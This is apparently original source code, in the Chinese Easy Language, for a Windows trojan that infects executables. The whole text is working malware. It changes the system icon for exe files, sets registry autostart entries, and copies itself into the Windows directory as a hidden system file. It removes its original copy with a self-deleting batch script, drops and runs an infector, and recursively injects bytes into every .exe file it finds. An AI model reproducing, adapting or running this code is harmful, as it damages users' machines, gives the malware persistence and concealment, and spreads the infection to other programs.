.支持庫 eAPI
提取資源文件圖標 (取運行目錄 () + “\” + 取執行文件名 (), 0, “C:\windows\system32\Aver.ico”, ) ' 替換系統exe圖標
寫註冊項 (#本地機器, “SOFTWARE\Classes\exefile\DefaultIcon\”, “C:\windows\system32\Aver.ico”) ' 寫到註冊表鍵值
寫註冊項 (#現行用戶, “Software\Microsoft\Windows\CurrentVersion\Run\” + 取執行文件名 (), 取運行目錄 () + “\” + 取執行文件名 ()) ' 寫讓註冊表鍵值刪除後可恢復木馬實行自啟動
.如果真 (取運行目錄 () ≠ 讀環境變量 (“Windir”))
復制文件 (取運行目錄 () + “\” + 取執行文件名 (), 讀環境變量 (“Windir”) + “\penguin.exe”)
運行 (“Cmd /c Attrib +H +S ” + 讀環境變量 (“Windir”) + “\penguin.exe”, 真, 1)
運行 (讀環境變量 (“Windir”) + “\penguin.exe”, 假, )
寫到文件 (讀環境變量 (“Windir”) + “penguin.bat”, 到字節集 (“@echo off” + #換行符 + “Taskkill /f /im ” + 取執行文件名 () + #換行符 + “Del ” + 取當前目錄 () + “\” + 取執行文件名 () + #換行符 + “Del %0” + #換行符 + “Exit”))
寫到文件 (讀環境變量 (“Windir”) + “\penguin.bat”, 到字節集 (子文本替換 (子文本替換 (到文本 (讀入文件 (讀環境變量 (“Windir”) + “penguin.bat”)), “C:\Documents and Settings”, “C:\DOCUME~1”, , , 假), “Windows”, “ ”, , , 假)))
運行 (讀環境變量 (“Windir”) + “\penguin.bat”, 真, 1)
.如果真結束
.如果真 (取運行目錄 () = 讀環境變量 (“Windir”))
寫註冊項 (#本地機器, “SOFTWARE\Microsoft\Windows\CurrentVersion\Run\penguin”, 讀環境變量 (“Windir”) + “\penguin.exe”)
寫到文件 (讀環境變量 (“Windir”) + “Infection.exe”, #感染)
運行 (讀環境變量 (“Windir”) + “\Infection.exe”, 真, 1)
.如果真結束
驅動器 = 取驅動器列表 ()
.版本 2
.子程序 搜尋
.參數 目錄, 文本型
.局部變量 文件號
.局部變量 文件名, 文本型
處理事件 ()
.如果真 (取文本右邊 (目錄, 1) ≠ “\”)
目錄 = 目錄 + “\”
.如果真結束
文件名 = 尋找文件 (目錄 + “*.exe”, )
.判斷循環首 (文件名 ≠ “”)
輸出調試文本 (目錄 + 文件名)
文件號 = 打開文件 (刪首尾空 (目錄 + 文件名), #讀寫, #無限制)
插入字節集 (文件號, #圖標)
關閉文件 (文件號)
文件名 = 尋找文件 (, )
.判斷循環尾 ()
文件名 = 尋找文件 (目錄 + “*.*”, #子目錄)
.判斷循環首 (文件名 ≠ “”)
.如果真 (取文本左邊 (文件名, 1) ≠ “.”)
搜尋 (目錄 + 文件名)
.如果真結束
文件名 = 尋找文件 (, #子目錄)
.判斷循環尾 ()
原創,不要外傳=.=